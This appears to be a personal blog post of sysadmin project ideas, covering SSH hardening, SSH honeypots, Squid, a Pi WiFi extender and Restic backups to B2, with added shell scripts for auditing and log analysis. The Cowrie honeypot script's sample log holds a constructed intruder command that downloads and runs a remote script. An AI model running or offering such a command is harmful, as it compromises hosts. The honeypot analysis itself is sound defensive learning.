I want to learn new (sysadmin-ish) things when I have some free time, because it is fun. I am not good enough at programming and the amount of logic it requires, but I do find solace in running and maintaining server systems. Here is a list of things I would like to try in the future.
Other than using a non-standard port for ssh (i.e. other than port 22), there is another way to hide your SSH port: port knocking. Moving to a non-standard port is not a security control on its own; an attacker can still find the port with nmap, so there is no guarantee you are safe. That is why it is crucial to disable password-based authentication for ssh and log in with keys instead. Rapid7 has a nice tutorial on implementing a port-knocking strategy with
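As an added example (written for this page, not taken from the post, from Rapid7 or from OpenSSH), the following POSIX shell script audits an sshd_config for the points above: password authentication off, keyboard-interactive authentication off as well (otherwise PAM can still prompt for a password), root login restricted, and a reminder that a non-default Port hides nothing from a full port scan. It only reads the global section of the file (everything above the first Match block), the path is whatever you pass in, and the configs used in testing it are constructed samples.

```sh
#!/bin/sh
# Audit an sshd_config for the settings discussed above.
# Example written for this page, not part of OpenSSH or of the original post.
# Usage: sh sshd_audit.sh /etc/ssh/sshd_config

# effective_value FILE KEYWORD -> the value sshd will use, lower-cased, or nothing.
# sshd honours the FIRST occurrence of a keyword; anything under a "Match"
# block is conditional, so we stop reading there. "Keyword=value" syntax is
# not handled, only the usual "Keyword value" form.
effective_value() {
    awk -v key="$2" '
        $1 ~ /^#/ || NF < 2         { next }
        tolower($1) == "match"      { exit }
        tolower($1) == tolower(key) { print tolower($2); exit }
    ' "$1"
}

# audit_sshd_config FILE -> prints findings; returns 1 if a weak setting was found
audit_sshd_config() {
    f=$1
    rc=0

    # The default is "yes", so a missing line is as weak as an explicit yes.
    pa=$(effective_value "$f" PasswordAuthentication)
    if [ "${pa:-yes}" != "no" ]; then
        echo "WEAK: PasswordAuthentication=${pa:-yes (default)}; set it to no and use keys"
        rc=1
    fi

    # With UsePAM yes, keyboard-interactive still lets PAM ask for a password even
    # when PasswordAuthentication is no. Newer OpenSSH calls the option
    # KbdInteractiveAuthentication, older releases ChallengeResponseAuthentication;
    # the default for both is yes.
    kbd=$(effective_value "$f" KbdInteractiveAuthentication)
    [ -n "$kbd" ] || kbd=$(effective_value "$f" ChallengeResponseAuthentication)
    if [ "${kbd:-yes}" != "no" ]; then
        echo "WEAK: keyboard-interactive auth is ${kbd:-yes (default)}; set KbdInteractiveAuthentication no"
        rc=1
    fi

    # Default since OpenSSH 7.0 is prohibit-password (key-only root).
    prl=$(effective_value "$f" PermitRootLogin)
    case "${prl:-prohibit-password}" in
        no|prohibit-password|without-password) ;;
        *) echo "WEAK: PermitRootLogin=$prl; use no or prohibit-password"; rc=1 ;;
    esac

    # A non-default port is not a security control: nmap -p- finds it anyway.
    port=$(effective_value "$f" Port)
    if [ "${port:-22}" != "22" ]; then
        echo "NOTE: sshd listens on port $port; that hides it only from the laziest scans"
    fi

    return $rc
}

# Run against a file when one is given; with no argument only define the functions.
if [ -n "${1:-}" ]; then
    audit_sshd_config "$1"
fi
```

The exit status is 1 when anything weak is found, so the script can sit in a configuration-management check or a cron job; the NOTE line is informational only.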
Once you feel good about securing a server with a bunch of good packages (e.g. rkhunter, etc.), what about fooling some pentesters? At some point, I would like to spin up a dummy server with the intention of learning what a script kiddie would do upon entering a server with malicious intent. There is a well-known package for running an ssh honeypot known as Kippo, with tutorials here and here. A simpler setup would be running a plain Docker container with its port 22 mapped to the host's port 22, as detailed here by Dan Sosedoff.
For a fancier honeypot setup, there is a project on GitHub that goes by the name Modern Honey Network (MHN) that allows you to run multiple honeypot packages with a single installation (that is pretty awesome). Here is a short write-up on Medium by David Greenwood to demonstrate the capability of MHN.
Update. It seems that Kippo's development has stopped. Here is a newer alternative, Cowrie, which started as a fork of Kippo.
When I first bumped into the article detailing the use of Sysdig to fish for hackers, I thought "wow, it is not that hard to figure this out". When I have plenty of free time to experiment with this, I would also run a poorly configured server with the mission of learning what happens when a script kiddie gets into my server. Here is another article detailing the use of Sysdig with Falco by MWR Infosec.
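The whole point of the honeypot passages above is to read what the visitors did afterwards, so here is an added example (written for this page, not part of Cowrie or of the original post) that summarises a Cowrie log with nothing but POSIX shell tools. It assumes Cowrie's JSON log (var/log/cowrie/cowrie.json, one object per line) and its event and field names (eventid, username, password, src_ip, session, input); the log lines embedded below are constructed samples using documentation IP ranges, not captured traffic. Two practical caveats before pointing port 22 at a honeypot: move your real sshd to another port first, or you lock yourself out, and keep the honeypot host isolated from anything you care about.

```sh
#!/bin/sh
# Summarise a Cowrie honeypot log: who connected, which credentials they tried,
# and what they typed once in. Example added for this page, not Cowrie's own tooling.
# Assumes Cowrie's JSON log format (one object per line, string-valued fields).

# Constructed sample lines, not real captures (203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges).
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1f0", "timestamp": "2018-02-10T03:00:01Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1f0"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "203.0.113.7", "session": "a1f0"}
{"eventid": "cowrie.login.success", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1f0"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "203.0.113.7", "session": "a1f0"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.4/x.sh; sh x.sh", "src_ip": "203.0.113.7", "session": "a1f0"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "session": "b7c2", "timestamp": "2018-02-10T03:05:44Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.23", "session": "b7c2"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "198.51.100.23", "session": "b7c2"}
{"eventid": "cowrie.login.failed", "username": "pi", "password": "raspberry", "src_ip": "198.51.100.23", "session": "b7c2"}
EOF

# field LINE NAME -> the string value of the top-level key NAME (flat objects only)
field() {
    printf '%s\n' "$1" | sed -n "s/.*\"$2\": *\"\([^\"]*\)\".*/\1/p"
}

# events LOG EVENTID -> the log lines of one event type, e.g. cowrie.login.failed
events() {
    grep "\"eventid\": *\"$2\"" "$1"
}

# top_credentials LOG [N] -> "count user:password" for the N most-tried pairs,
# counting both failed and successful logins
top_credentials() {
    grep '"eventid": *"cowrie\.login\.' "$1" | while IFS= read -r line; do
        printf '%s:%s\n' "$(field "$line" username)" "$(field "$line" password)"
    done | sort | uniq -c | sort -rn | head -n "${2:-5}" | awk '{ print $1, $2 }'
}

# session_commands LOG SESSION -> the commands typed in one session, in order
session_commands() {
    events "$1" cowrie.command.input | grep "\"session\": *\"$2\"" | while IFS= read -r line; do
        field "$line" input
    done
}

# sources LOG -> distinct source addresses that opened a session
sources() {
    events "$1" cowrie.session.connect | while IFS= read -r line; do
        field "$line" src_ip
    done | sort -u
}
```

Against a real deployment you would call these on the live file, e.g. `top_credentials var/log/cowrie/cowrie.json 20`, and `session_commands` on the sessions that reached `cowrie.login.success`, since those are the ones that show what the intruder actually wanted to run. The `field` helper is deliberately naive (no JSON escaping), which is fine for Cowrie's flat string fields but not for arbitrary JSON.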
Pentesting is an abbreviation for "penetration testing", where an individual performs attacks on systems or web services in order to gain access. There are a lot of tools for this, the most popular among them being Metasploit (open source, available on GitHub). There is a project based on Metasploit known as Autosploit.py. However, according to Rapid7, the current form of Autosploit.py could land a user "in CFAA hot water" because it picks targets indiscriminately by querying hosts from the Shodan API. Another tool that could be used is Armitage, which comes with a GUI and is also based on Metasploit. Maybe I should set up an instance with known vulnerabilities and try to gain access to it. By the way, there is an online manual for Metasploit.
Here is BitWarden, an open-source alternative to commercial password storage and syncing solutions like LastPass and 1Password. I have been using 1Password for about 2 years now (as of writing this, Feb 2018). The software engineer who maintains the code did an AMA on r/IAmA. The good thing is that BitWarden comes with a Docker Compose script for in-house deployment, but it requires 2 GB of memory. As of now, the RasPi can't handle this, but the Pine64 should be able to.
Local Squid Proxy
Say I had enough money and time to set up a local RasPi cluster; I would like to have a local Pi-hole server and a local Squid proxy. If I can cache some stuff locally, that would be awesome. I read about Squid in the past: terminating or intercepting HTTPS connections (Squid's ssl-bump feature) makes the proxy a man-in-the-middle, so every client on the network has to trust a CA certificate you generate, and applications that pin their certificates will refuse to connect through it. Here are some readings:
- Setting up Explicit Squid Proxy on Alpine Linux wiki.
- Intercepting HTTPS Traffic by Stephen C. Phillips.
- MITM Proxy, an open source application.
- Squid 3.1 Caching Proxy with SSL by Jim Araujo.
Rationale for doing this: a local cache to speed up certain connections (think of the YouTube videos I keep playing). One caveat: video sites serve their content over HTTPS with signed, expiring URLs, so a generic cache like Squid gets little benefit there without site-specific rewriting. Probably I should get an actual mini server with an x86 processor instead of using an ARM board. But that would probably cost quite a bit more money, and RAM doesn't come cheap these days.
I think there are some good reasons to start learning some basic animation. Knowledge of Blender would give me an edge in 3D modeling, so that I can 3D-print some lab stuff (e.g. a magnetic rack for 1.5 ml tubes). Knowledge of Synfig Studio is for laughs, and knowledge of the Godot Engine is just for fun. But first and foremost, I should pick up a programming language beforehand, preferably R or Python, because these two are directly applicable to my field.
Pi 3 WiFi Extender
I was thinking about this project after I saw this article on CloudFlare: Privacy-Protecting Portable Router, which mentions the use of the GL.iNet GL-AR750 as a WiFi extender/repeater.
The basic requirement for a WiFi extender is that it must have 2 NICs. The GL-AR750 is great because it supports 802.11ac, which works on the 5 GHz band (faster than 2.4 GHz). There is a knowledge gap, as I do not understand what WISP mode is. Maybe the right question is whether, for this to work well, a device must have 2 wireless NICs. I do not know how many wireless NICs the GL-AR750 has.
Update. Okay, after a quick search: WISP mode allows one adapter to act as a WiFi client to an upstream access point while at the same time acting as an access point for downstream clients. One adapter does both, instead of having 2 separate dedicated NICs.
Maybe I should get a small travel router with WISP mode for... well... traveling. For better security and isolation when connecting to public hotspot, that is.
Update. Here is an interesting project: IOT WiFi, Raspberry Pi AP + Client. With this, I just need to run Docker on a Pi 3, pull the Docker image (Alpine-based, really small), run it in privileged mode, and the container will manage wpa_supplicant so that the Pi 3 can act as a client and also as an access point. Perfect!
Update: However, be fully aware of the hardware/technical limitations of using a RasPi 3 B+ as a WiFi extender. First, a WiFi extender is itself a compromise. With an extender sitting between the router (to the internet) and the desktop (the client), every frame crosses the air twice: instead of one wireless link, PC <--> router, there are two, PC <--> extender <--> router, sharing the same spectrum.
This discussion tends to get a little confusing. "Having a repeater halves the local bandwidth and it will only impact internet speed if the halved local throughput is less than the internet speed." The way I understand this: if the wireless link runs at 166 MBytes/sec (roughly the 1.3 Gbit/s link rate of a three-stream 802.11ac radio), repeating halves it to about 83 MBytes/sec, which is still far above a typical 100 Mbit/s internet connection. Two caveats apply on a Pi, though: link rate is not throughput, and the Pi 3 B+'s built-in radio is a single-stream 802.11ac device with a 433 Mbit/s link rate and real throughput well below that, so the halved link can easily become the bottleneck. This is briefly explained here.
By the way, the Arch Linux wiki has a great page on software access points. Probably a good resource.
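Whether one adapter can be a client and an access point at the same time is not a matter of software but of what the driver advertises in the "valid interface combinations" section of `iw list`. The following is an added example (written for this page, not part of the IOT WiFi project or of the original post) that parses that section with POSIX shell tools and reports whether a managed and an AP interface may coexist, and how many distinct channels the combination allows. IW_SAMPLE is a constructed excerpt in iw's output format (real iw output is tab-indented), not output captured from a Raspberry Pi.

```sh
#!/bin/sh
# Check whether a Wi-Fi adapter can run an AP and a client (managed) interface
# concurrently, from the "valid interface combinations" block of `iw list`.
# Example added for this page, not part of iw or of the IOT WiFi project.

# Constructed excerpt in iw's format (not captured from a real device).
IW_SAMPLE='Wiphy phy0
    Supported interface modes:
         * managed
         * AP
         * P2P-client
         * P2P-GO
         * P2P-device
    valid interface combinations:
         * #{ managed } <= 1, #{ P2P-device } <= 1, #{ P2P-client, P2P-GO } <= 1,
           total <= 3, #channels <= 2
         * #{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,
           total <= 4, #channels <= 1
    Device supports scan flush.'

# combinations IW_OUTPUT -> one interface combination per line, continuation
# lines joined, leading "* " and surplus whitespace removed. Only the first
# "valid interface combinations" block is read (one wiphy).
combinations() {
    printf '%s\n' "$1" | tr -s ' \t' ' ' | awk '
        /valid interface combinations:/ { inblk = 1; next }
        !inblk      { next }
        /^ ?\* /    { if (cur != "") print cur; cur = $0; next }        # new entry
        /<=/        { sub(/^ +/, ""); cur = cur " " $0; next }          # continuation
                    { exit }                                            # block ended
        END         { if (cur != "") print cur }
    ' | sed 's/^ \* //'
}

# ap_sta_combo IW_OUTPUT -> the first combination that allows both a managed
# and an AP interface, or nothing
ap_sta_combo() {
    combinations "$1" | grep -E '#\{[^}]*[ ,]managed[ ,]' | grep -E '#\{[^}]*[ ,]AP[ ,]' | head -n 1
}

# supports_ap_sta IW_OUTPUT -> exit 0 if AP + client at the same time is allowed
supports_ap_sta() {
    [ -n "$(ap_sta_combo "$1")" ]
}

# ap_sta_channels IW_OUTPUT -> the "#channels" limit of that combination.
# 1 means the AP must use the same channel as the upstream network the
# client side is associated to, which is the usual constraint for repeaters.
ap_sta_channels() {
    ap_sta_combo "$1" | sed -n 's/.*#channels <= \([0-9][0-9]*\).*/\1/p'
}
```

On a real machine, run it as `supports_ap_sta "$(iw phy phy0 info)" && echo ok` (or `iw list` when there is only one adapter); if the result is a `#channels <= 1` combination, hostapd must be configured on the channel wpa_supplicant ended up on, which is exactly the coupling that makes a single-radio repeater fragile.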
Local Storage to B2
I am getting a homebrew NAS soon. Since the probability of something going wrong approaches 1 over time, I would like to have a backup system in place. I would like to try BackBlaze B2.
Briefly, on the setup: I would go with Pine64's ROCK64 board, since its gigabit Ethernet and USB 3.0 let it reach roughly 100 MB/sec from an SSD, while a Pi 3 (USB 2.0, 100 Mbit Ethernet) only reaches about 10.3 MB/sec.
As for the backup, B2 looks like it can handle it. Here is a tutorial by BackBlaze on backing up data to B2 with Restic. Very likely I will stick with Restic, but I would also like to see if RClone can do a better job.
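As an added example of the Restic-to-B2 routine the tutorial describes (written for this page, not BackBlaze's or Restic's own script), here is a small POSIX shell wrapper that refuses to run with missing or world-readable credentials, initialises the repository on first use, backs up, and applies a retention policy. The bucket name, repository path and source directory are placeholders; the environment variable names are the ones Restic actually reads (B2_ACCOUNT_ID, B2_ACCOUNT_KEY, RESTIC_PASSWORD_FILE). The permission check uses GNU `stat -c`, so it assumes Linux.

```sh
#!/bin/sh
# Back up a NAS directory to Backblaze B2 with restic.
# Example added for this page, not from the post, Backblaze or restic.
#
# Credentials come from the environment (restic's real variable names):
#   B2_ACCOUNT_ID / B2_ACCOUNT_KEY  use a B2 application key restricted to this
#                                   bucket, never the account master key
#   RESTIC_PASSWORD_FILE            the repository password, mode 0600
# Placeholders (assumptions for this example): bucket "my-nas-backups",
# repository path "/nas", source directory /srv/nas.
RESTIC_REPO=${RESTIC_REPO:-b2:my-nas-backups:/nas}
SOURCE_DIR=${SOURCE_DIR:-/srv/nas}

# secret_file_ok FILE -> 0 if it exists, is non-empty and has no group/other bits
# (e.g. 600 or 400). Uses GNU stat, so Linux is assumed.
secret_file_ok() {
    [ -s "$1" ] || return 1
    case "$(stat -c '%a' "$1" 2>/dev/null)" in
        *00) return 0 ;;
        *)   return 1 ;;
    esac
}

# env_ok -> 0 when every credential restic needs is present and sane
env_ok() {
    [ -n "${B2_ACCOUNT_ID:-}" ] && [ -n "${B2_ACCOUNT_KEY:-}" ] || return 1
    secret_file_ok "${RESTIC_PASSWORD_FILE:-}"
}

# backup -> initialise the repository if it does not exist yet, then snapshot SOURCE_DIR
backup() {
    env_ok || { echo "missing or world-readable credentials; refusing to run" >&2; return 1; }
    restic -r "$RESTIC_REPO" snapshots >/dev/null 2>&1 || restic -r "$RESTIC_REPO" init
    restic -r "$RESTIC_REPO" backup --exclude-caches "$SOURCE_DIR"
}

# prune -> keep 7 daily, 4 weekly and 12 monthly snapshots, drop the rest, then verify.
# forget/prune destroy data, so consider running this step from a trusted admin
# host on a schedule rather than from the NAS itself, and leave the bucket's
# default "keep all file versions" lifecycle in place so a bad prune is recoverable.
prune() {
    env_ok || { echo "missing or world-readable credentials; refusing to run" >&2; return 1; }
    restic -r "$RESTIC_REPO" forget --keep-daily 7 --keep-weekly 4 --keep-monthly 12 --prune
    restic -r "$RESTIC_REPO" check
}

case "${1:-}" in
    backup) backup ;;
    prune)  prune ;;
    "")     : ;;    # sourced or run without a sub-command: only define the functions
    *)      echo "usage: $0 backup|prune" >&2; exit 2 ;;
esac
```

Run `sh nas-b2.sh backup` from cron with the three variables exported in the job's environment; `restic check` after pruning costs a little B2 traffic but is the only way to notice a repository that has quietly gone bad before you need to restore from it.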